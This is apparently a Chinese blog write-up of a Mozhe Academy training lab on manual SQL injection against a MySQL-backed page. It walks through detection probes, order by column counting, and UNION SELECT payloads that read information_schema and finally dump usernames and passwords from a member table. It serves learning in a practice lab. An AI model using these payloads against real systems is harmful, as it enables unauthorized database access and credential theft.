墨者学院-SQL手工注入漏洞测试(MySQL数据库)

墨者学院-SQL手工注入漏洞测试(MySQL数据库)_第1张图片
image.png

思路:
1.判断是否存在注入点。使用and、or、’,判断是否有注入,是否存在宽字节注入.是否存在http头注入以及工具检测等。
2.构造闭合。查询查询字段数,字段位置,利用mysql的特性,information_schema中,tables表存在着数据库名字对应表名,columns表存在表名对应列名,获取相关数据,information_schema.tables 的table_name,information_schema.columns的clumn_name。

验证:

  • 判断是否存在注入点。加'页面报错。and 1=1 和 and 1=2,页面发生变化。存在注入点。


    墨者学院-SQL手工注入漏洞测试(MySQL数据库)_第2张图片
    image.png

    墨者学院-SQL手工注入漏洞测试(MySQL数据库)_第3张图片
    image.png

    墨者学院-SQL手工注入漏洞测试(MySQL数据库)_第4张图片
    image.png
  • 判断字段。order by 5页面报错。order by 4 页面正常。
    墨者学院-SQL手工注入漏洞测试(MySQL数据库)_第5张图片
    image.png

    墨者学院-SQL手工注入漏洞测试(MySQL数据库)_第6张图片
    image.png
  • 判断位置。union select 1,2,3,4


    墨者学院-SQL手工注入漏洞测试(MySQL数据库)_第7张图片
    image.png
  • 判断数据库的名字和用户名字。union select 1,database(),user(),4


    墨者学院-SQL手工注入漏洞测试(MySQL数据库)_第8张图片
    image.png
  • 判断表名。union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()


    墨者学院-SQL手工注入漏洞测试(MySQL数据库)_第9张图片
    image.png

    *判断列名。union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'


    墨者学院-SQL手工注入漏洞测试(MySQL数据库)_第10张图片
    image.png
  • 获取字段 union select 1,group_concat(name),group_concat(password),4 from StormGroup_member


    墨者学院-SQL手工注入漏洞测试(MySQL数据库)_第11张图片
    image.png
  • 风雨过后就是彩虹。

你可能感兴趣的:(墨者学院-SQL手工注入漏洞测试(MySQL数据库))